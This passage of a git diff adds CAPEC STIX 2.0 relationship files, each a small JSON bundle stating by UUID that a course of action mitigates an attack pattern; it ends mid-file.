b/capec/relationship/relationship--b3f766e9-52da-4e96-b4e2-ceabba6c233c.json new file mode 100644 index 0000000000..f7efb4bb70 --- /dev/null +++ b/capec/relationship/relationship--b3f766e9-52da-4e96-b4e2-ceabba6c233c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b3b37d20-008d-4bed-8916-a0099a88664f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b3f766e9-52da-4e96-b4e2-ceabba6c233c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a6775324-11a4-4066-80ff-bc354993450c", + "target_ref": "attack-pattern--35adbffa-db1b-48cb-a106-51dccf223be1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b4102a59-40e2-4b12-9a6c-f1f3747926e5.json b/capec/relationship/relationship--b4102a59-40e2-4b12-9a6c-f1f3747926e5.json new file mode 100644 index 0000000000..e6212fe90d --- /dev/null +++ b/capec/relationship/relationship--b4102a59-40e2-4b12-9a6c-f1f3747926e5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5b4d3f8d-29e1-4ea9-8632-877ccdd1ac13", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b4102a59-40e2-4b12-9a6c-f1f3747926e5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--de1dd950-a57f-41b0-8ba9-0ca088dc0128", + "target_ref": "attack-pattern--da89b021-dcf2-4901-9584-c264140320ae", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b43a9a55-d2a6-43fb-a6a2-a6dd5eda77b5.json b/capec/relationship/relationship--b43a9a55-d2a6-43fb-a6a2-a6dd5eda77b5.json new file mode 100644 index 0000000000..1cb7640bf8 --- /dev/null +++ b/capec/relationship/relationship--b43a9a55-d2a6-43fb-a6a2-a6dd5eda77b5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--064eff2a-66e2-4993-a2c0-c6781797db17", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b43a9a55-d2a6-43fb-a6a2-a6dd5eda77b5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9321d2d-a62c-4f97-bac1-3a29e9ed5b43", + "target_ref": "attack-pattern--391db10c-8a3c-4887-8a83-f965edc5099d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b4584b1d-d9de-42d3-85ee-c0cd0d5a2e0b.json b/capec/relationship/relationship--b4584b1d-d9de-42d3-85ee-c0cd0d5a2e0b.json new file mode 100644 index 0000000000..31f8f7c1ea --- /dev/null +++ b/capec/relationship/relationship--b4584b1d-d9de-42d3-85ee-c0cd0d5a2e0b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4370192c-4d62-41e2-945b-a774b54dbd92", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b4584b1d-d9de-42d3-85ee-c0cd0d5a2e0b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bc0985a3-6d23-4682-a463-47c3f62257be", + "target_ref": "attack-pattern--6f84c023-688f-4c51-b5b2-eeb19661cb4e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b4b6093c-6dee-4797-a60d-79cda0f1293b.json b/capec/relationship/relationship--b4b6093c-6dee-4797-a60d-79cda0f1293b.json new file mode 100644 index 0000000000..ec7f49902e --- /dev/null +++ b/capec/relationship/relationship--b4b6093c-6dee-4797-a60d-79cda0f1293b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--688301fe-b49f-4613-9b4e-1c03d958c19d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b4b6093c-6dee-4797-a60d-79cda0f1293b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1da8555a-673e-49d9-a3a6-fa1404b9d1a9", + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b5155ed4-8f92-4832-b65a-80ac64463a0a.json b/capec/relationship/relationship--b5155ed4-8f92-4832-b65a-80ac64463a0a.json new file mode 100644 index 0000000000..849b2f7f59 --- /dev/null +++ b/capec/relationship/relationship--b5155ed4-8f92-4832-b65a-80ac64463a0a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7d4f6376-76f5-48ca-924a-f1a7d4bbc44f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b5155ed4-8f92-4832-b65a-80ac64463a0a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--51b77eec-ff72-449d-850d-ed8bd19ca6b3", + "target_ref": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b54d0e01-4c7b-4f6b-b3eb-570663235131.json b/capec/relationship/relationship--b54d0e01-4c7b-4f6b-b3eb-570663235131.json new file mode 100644 index 0000000000..2fc6dea863 --- /dev/null +++ b/capec/relationship/relationship--b54d0e01-4c7b-4f6b-b3eb-570663235131.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ecf78613-8697-4e04-9036-049866ccb1d8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b54d0e01-4c7b-4f6b-b3eb-570663235131", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--4a88fa86-0860-40da-ad2f-8fb4df569c1b", + "target_ref": "attack-pattern--7afbfdbc-8262-48b9-b349-cc7888fc880f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b5a8d903-9fac-4d31-be99-93da4e1b8d06.json b/capec/relationship/relationship--b5a8d903-9fac-4d31-be99-93da4e1b8d06.json new file mode 100644 index 0000000000..1dabdb45e3 --- /dev/null +++ b/capec/relationship/relationship--b5a8d903-9fac-4d31-be99-93da4e1b8d06.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b7c544b1-dff5-4831-ade9-c4b1af1016ca", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b5a8d903-9fac-4d31-be99-93da4e1b8d06", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d86866b-c648-423e-a9ff-20a649ccddc1", + "target_ref": "attack-pattern--474dbe2e-a61f-4143-b671-a63d7a1df95f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b6f089ae-d8b8-4e88-a730-5eff3b909673.json b/capec/relationship/relationship--b6f089ae-d8b8-4e88-a730-5eff3b909673.json new file mode 100644 index 0000000000..e9c9de52b2 --- /dev/null +++ b/capec/relationship/relationship--b6f089ae-d8b8-4e88-a730-5eff3b909673.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d5617738-f605-425f-8d8d-b33d9819de6a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b6f089ae-d8b8-4e88-a730-5eff3b909673", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8f12dfb6-e5d2-493f-80c8-de6d843475b6", + "target_ref": "attack-pattern--39ab0d55-78c5-4be6-a99a-25f80706340a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b714a160-45ab-42cc-8ed2-9e2f3b91b07b.json b/capec/relationship/relationship--b714a160-45ab-42cc-8ed2-9e2f3b91b07b.json new file mode 100644 index 0000000000..c18c4bf477 --- /dev/null +++ b/capec/relationship/relationship--b714a160-45ab-42cc-8ed2-9e2f3b91b07b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--db399a8a-15c0-4418-ab06-8ab37b9f993a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b714a160-45ab-42cc-8ed2-9e2f3b91b07b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7a4c49a-70b4-4e12-afa1-c4753210529c", + "target_ref": "attack-pattern--7fd466e3-0437-45f6-8cdc-0d9de4a4df92", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b790204c-09bb-42ab-af79-4dfe85f6a848.json b/capec/relationship/relationship--b790204c-09bb-42ab-af79-4dfe85f6a848.json new file mode 100644 index 0000000000..202d1eb0d3 --- /dev/null +++ b/capec/relationship/relationship--b790204c-09bb-42ab-af79-4dfe85f6a848.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a94690f3-7a88-450c-b2d5-34c9b4f22079", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b790204c-09bb-42ab-af79-4dfe85f6a848", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c4bb2d50-037a-4179-b7d7-e8288bc4ec88", + "target_ref": "attack-pattern--c565b674-66ce-418c-8611-0e2cfb445c42", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b7a2284e-2098-4d9c-9fd2-051cb7581e03.json b/capec/relationship/relationship--b7a2284e-2098-4d9c-9fd2-051cb7581e03.json new file mode 100644 index 0000000000..578b7cda8a --- /dev/null +++ b/capec/relationship/relationship--b7a2284e-2098-4d9c-9fd2-051cb7581e03.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b12a1876-aae1-42f9-9cb7-2ba4fe58a8eb", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b7a2284e-2098-4d9c-9fd2-051cb7581e03", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0e44c49a-a553-4aaf-81b5-3a5d77a541e7", + "target_ref": "attack-pattern--81cb8af7-a9ff-4c4d-822c-c74a618da6ad", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b7a582bf-6fc4-41b5-aa82-24a573fc080f.json b/capec/relationship/relationship--b7a582bf-6fc4-41b5-aa82-24a573fc080f.json new file mode 100644 index 0000000000..805bc151dd --- /dev/null +++ b/capec/relationship/relationship--b7a582bf-6fc4-41b5-aa82-24a573fc080f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5d31643f-6942-4e27-841a-f9c5d913e2e6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b7a582bf-6fc4-41b5-aa82-24a573fc080f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--14b2914a-fe72-4ed6-8a7b-1b4f29ad4acf", + "target_ref": "attack-pattern--7f7b1917-63bb-43a7-b36b-a90dbc6072e5", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b7ce42f6-518b-4c8e-8da7-ae32c04486c8.json b/capec/relationship/relationship--b7ce42f6-518b-4c8e-8da7-ae32c04486c8.json new file mode 100644 index 0000000000..ae17558708 --- /dev/null +++ b/capec/relationship/relationship--b7ce42f6-518b-4c8e-8da7-ae32c04486c8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8c9c5663-b034-4510-ae55-fcdfad62cb41", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b7ce42f6-518b-4c8e-8da7-ae32c04486c8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2f881ca2-2823-42d7-b6bd-de209f7d169e", + "target_ref": "attack-pattern--9fe55f74-de34-4b76-b645-a747f47c67b5", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b8735d4a-9ef5-4d8b-92ec-ee3b9b0f2cfc.json b/capec/relationship/relationship--b8735d4a-9ef5-4d8b-92ec-ee3b9b0f2cfc.json new file mode 100644 index 0000000000..b619e052a1 --- /dev/null +++ b/capec/relationship/relationship--b8735d4a-9ef5-4d8b-92ec-ee3b9b0f2cfc.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e6f71bc6-a055-4af6-a7e8-0cbb8ba546d4", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b8735d4a-9ef5-4d8b-92ec-ee3b9b0f2cfc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a78dc251-20b0-40ba-8c69-a48e4dc81eb5", + "target_ref": "attack-pattern--5d250b2b-1f3f-4a41-9cbf-7c91fb7e4c69", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b8d0a57a-7ab7-4d6c-9f1b-77b16561a7db.json b/capec/relationship/relationship--b8d0a57a-7ab7-4d6c-9f1b-77b16561a7db.json new file mode 100644 index 0000000000..c58fae72aa --- /dev/null +++ b/capec/relationship/relationship--b8d0a57a-7ab7-4d6c-9f1b-77b16561a7db.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--89e23ec4-1042-4668-a59b-736df6f94a35", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b8d0a57a-7ab7-4d6c-9f1b-77b16561a7db", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--557e63a0-6f2a-4ffd-baf2-a6dc676a7156", + "target_ref": "attack-pattern--9e9ffae0-b1d1-4680-b729-8c2b7677d2f6", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b8feb49d-0da7-4086-9ff4-922eda80d0d1.json b/capec/relationship/relationship--b8feb49d-0da7-4086-9ff4-922eda80d0d1.json new file mode 100644 index 0000000000..06af954435 --- /dev/null +++ b/capec/relationship/relationship--b8feb49d-0da7-4086-9ff4-922eda80d0d1.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b78b2ac3-14ba-4f21-a165-4e99d48a98a3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b8feb49d-0da7-4086-9ff4-922eda80d0d1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--12dd252e-6383-44c6-a23a-94f0d18dd77a", + "target_ref": "attack-pattern--3633a1c0-2af2-4343-b504-4e69c76db60e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b914cf9d-94aa-417c-88b4-819c3934159f.json b/capec/relationship/relationship--b914cf9d-94aa-417c-88b4-819c3934159f.json new file mode 100644 index 0000000000..11ba45c051 --- /dev/null +++ b/capec/relationship/relationship--b914cf9d-94aa-417c-88b4-819c3934159f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d0bce9f0-e4be-4643-8500-3bfc0e654e4c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b914cf9d-94aa-417c-88b4-819c3934159f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a96d9ccc-8454-4b63-853f-1cfd142e970c", + "target_ref": "attack-pattern--2639a852-3832-492a-b16c-0d568ecb8fa7", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b91617f1-b967-4057-9b2d-257754101ebf.json b/capec/relationship/relationship--b91617f1-b967-4057-9b2d-257754101ebf.json new file mode 100644 index 0000000000..759afef1e9 --- /dev/null +++ b/capec/relationship/relationship--b91617f1-b967-4057-9b2d-257754101ebf.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--af39c7ba-e2e1-4567-b7d9-281d793d88cc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b91617f1-b967-4057-9b2d-257754101ebf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3a00550f-fc0c-4882-a97f-c5d874abb7e3", + "target_ref": "attack-pattern--afeca46a-0f28-42f3-9082-9bd39a5cd597", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b94b8cfb-b5b8-4c4f-aaed-9a9e632ac4f7.json b/capec/relationship/relationship--b94b8cfb-b5b8-4c4f-aaed-9a9e632ac4f7.json new file mode 100644 index 0000000000..561f1b6322 --- /dev/null +++ b/capec/relationship/relationship--b94b8cfb-b5b8-4c4f-aaed-9a9e632ac4f7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a32d575b-f86d-4fb3-853e-5a05ff3ced29", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b94b8cfb-b5b8-4c4f-aaed-9a9e632ac4f7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--75cfbaa2-4ebd-4bd2-8bcd-1cc9bb5c18f6", + "target_ref": "attack-pattern--402bbd1b-6fee-44fd-8c59-e90acccd0be6", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b97f03f1-ddab-49e7-81c2-c49afb2dde4e.json b/capec/relationship/relationship--b97f03f1-ddab-49e7-81c2-c49afb2dde4e.json new file mode 100644 index 0000000000..c4e436148a --- /dev/null +++ b/capec/relationship/relationship--b97f03f1-ddab-49e7-81c2-c49afb2dde4e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d7a34708-e469-4b9a-8cc2-4ee21931dece", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b97f03f1-ddab-49e7-81c2-c49afb2dde4e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5dad1672-a750-4909-8d3a-f583109c6a7b", + "target_ref": "attack-pattern--42f88e6b-30dd-4bc5-ba5b-5ec35b0cacaa", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b98b347f-fe01-4005-96a1-407ba02335de.json b/capec/relationship/relationship--b98b347f-fe01-4005-96a1-407ba02335de.json new file mode 100644 index 0000000000..492721c82a --- /dev/null +++ b/capec/relationship/relationship--b98b347f-fe01-4005-96a1-407ba02335de.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8bb33d4c-3f59-40c2-b58c-323927f269bb", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b98b347f-fe01-4005-96a1-407ba02335de", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--dc06e25a-ebf3-4958-a253-78d3abc83b7a", + "target_ref": "attack-pattern--126e4910-37df-4f3b-901a-00b698bc89a0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ba665997-3d38-41e2-95e3-4426e254e080.json b/capec/relationship/relationship--ba665997-3d38-41e2-95e3-4426e254e080.json new file mode 100644 index 0000000000..ea4d2b7dfc --- /dev/null +++ b/capec/relationship/relationship--ba665997-3d38-41e2-95e3-4426e254e080.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--cbb33559-c3af-466a-add9-33fc6314985e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ba665997-3d38-41e2-95e3-4426e254e080", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--06cabbce-d4a4-4040-8bb9-9d2d6e4efcd5", + "target_ref": "attack-pattern--4dc9dd79-0519-4693-b524-885a73e82fdd", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ba8d1163-39d3-4a85-907a-f806c1d6678a.json b/capec/relationship/relationship--ba8d1163-39d3-4a85-907a-f806c1d6678a.json new file mode 100644 index 0000000000..5bb4d9e72e --- /dev/null +++ b/capec/relationship/relationship--ba8d1163-39d3-4a85-907a-f806c1d6678a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d0075ca8-8304-4f86-ab8c-dff53893a529", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ba8d1163-39d3-4a85-907a-f806c1d6678a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c3b2b74c-78d3-4ea4-90e6-66d9552867fe", + "target_ref": "attack-pattern--63832d3e-2917-48d6-9cdc-118a38e01fcf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--bae1d426-0299-4081-97f5-202119a241f0.json b/capec/relationship/relationship--bae1d426-0299-4081-97f5-202119a241f0.json new file mode 100644 index 0000000000..a6be780ef8 --- /dev/null +++ b/capec/relationship/relationship--bae1d426-0299-4081-97f5-202119a241f0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--785330c6-86fe-4605-8617-dcf779a54f95", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--bae1d426-0299-4081-97f5-202119a241f0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d57aef14-fcf9-41f7-a9a3-e071e4282415", + "target_ref": "attack-pattern--81862912-f3ac-4fdd-aa80-82514eddbe08", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--bc1c0d60-d9b5-4a17-84a5-e572772c76ea.json b/capec/relationship/relationship--bc1c0d60-d9b5-4a17-84a5-e572772c76ea.json new file mode 100644 index 0000000000..fb4408ed96 --- /dev/null +++ b/capec/relationship/relationship--bc1c0d60-d9b5-4a17-84a5-e572772c76ea.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f2cca63f-e60b-444f-9958-0423ed420c20", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--bc1c0d60-d9b5-4a17-84a5-e572772c76ea", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c5259bad-3aa0-4826-acb3-eef0dae15daa", + "target_ref": "attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--bce6dd14-bef7-481a-9104-ce0713480b0b.json b/capec/relationship/relationship--bce6dd14-bef7-481a-9104-ce0713480b0b.json new file mode 100644 index 0000000000..ac26ae4e32 --- /dev/null +++ b/capec/relationship/relationship--bce6dd14-bef7-481a-9104-ce0713480b0b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--95736393-df78-4872-9a7b-bd48630b4f02", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--bce6dd14-bef7-481a-9104-ce0713480b0b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--69bb2312-f52f-4ff7-b491-a28d010c2c31", + "target_ref": "attack-pattern--b55ae5bb-98b3-49e0-8a91-1b719e141681", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--bd42a550-a4da-4086-a5c8-c1e27cb48ac0.json b/capec/relationship/relationship--bd42a550-a4da-4086-a5c8-c1e27cb48ac0.json new file mode 100644 index 0000000000..1bb26e6682 --- /dev/null +++ b/capec/relationship/relationship--bd42a550-a4da-4086-a5c8-c1e27cb48ac0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4674667c-3c77-449f-bd91-ee58fb4315f4", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--bd42a550-a4da-4086-a5c8-c1e27cb48ac0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3463f037-c2bb-4801-a794-50ad603d3a5b", + "target_ref": 